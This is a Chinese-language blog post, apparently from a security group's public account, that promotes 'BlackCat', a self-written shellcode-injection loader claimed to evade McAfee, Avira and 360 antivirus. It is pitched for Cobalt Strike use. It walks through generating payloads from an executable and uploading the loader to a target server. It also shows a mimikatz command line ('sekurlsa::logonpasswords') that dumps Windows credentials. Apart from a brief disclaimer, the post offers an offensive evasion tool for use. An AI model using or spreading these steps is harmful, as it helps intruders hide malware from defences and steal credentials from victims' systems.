BlackCat_自写模块化免杀工具

ivi

YongYe安全 YongYe 安全实验室 2023-12-04 12:33 发表于韩国

请勿使用此工具进行任何未经授权或非法的网络攻击，我对使用此工具进行的任何误用或非法活动不承担任何责任。



1、随便写着玩的工具。已经过测试并证明可以绕过 McAfee、Avira、360 等防病毒软件。除了规避静态查杀，还能绕过部分动态查杀。该工具的核心功能依赖于 shellcode 注入技术。

2、该工具的最初设计意图是模块化的绕过防病毒（AV）软件，去除每个工具都需要免杀的麻烦操作。这个工具只需要将每个exe工具生成一次然后保存生成的两个载荷，后续不需要再次生成也可以使用。

3、建议对需要加载的工具重构以删除某些指纹并增加绕过防病毒（AV）软件的概率，当然这个工具还会被进一步修改以再次逃避AV检测。

4、由于最后所提到的问题，其使用宽度受到一些限制，具体可以自行发掘。

5、代码比较难看没啥反编译的必要，目前还没有开源或更新的计划，但是保证代码中绝对没有后门。未来有计划重构代码，改用DLL加载、注入的方式解决第四点的问题。现在这个工具仍然是 Cobalt Strike 等场景中的一个有用工具。


帮助信息

1. options:
   
2.   -h, --help            show this help message and exit
   
3.   -f FILE, --file FILE  filename,Files to be loaded.

复制代码

使用步骤

生成载荷-->重命名-->上传利用

1.使用Admin端生成payload，下面以mimikatz为例。

注：exeNmae是要使用的可执行文件的软件名称，不需要后缀。仅对exe格式文件有效。

执行后会生成两个文件：一个是shellcode文件（mimikatz.txt），另一个是攻击负载（mimikatz_Payload.txt）。

1. BlackCat-Admin_v1.2.exe -f exeName
   
2. 例:BlackCat-Admin_v1.2.exe -f mimikatz

复制代码

2.重命名有效负载

1. ren exeName_Payload.txt Payload.txt
   
2. 例:ren mimikatz_Payload.txt Payload.txt

复制代码

3.上传加载器到目标服务器，加载工具并执行命令。

将BlackCat-Agent.exe、exeName.txt和payload.txt这三个文件上传到目标服务器。

目前不开放远程加载方案，仅提供本地加载解决方案。

1. BlackCat-Agent_v1.2.exe exeName.txt  cmd
   
2. 例:BlackCat-Agent_v1.2.exe mimikatz.txt "privilege::debug" "sekurlsa::logonpasswords" exit

复制代码

BlackCat-AgentCs_v1.2.exe 和 BlackCat-Agent_v1.2.exe 之间的区别在于其用户界面。BlackCat-AgentCs 不显示终端或图形界面，因此适合像 Cobalt Strike 这样需要隐秘性的场景。BlackCat-Agent可以在终端界面查看命令执行的反馈。




已知错误，暂未修复。

运行程序后，所有命令行参数都将传递给执行的工具。Mimikatz、Cobalt Strike的使用不受影响。



工具地址：https://github.com/YongYe-Security/BlackCat

解压密码在公众号群聊里。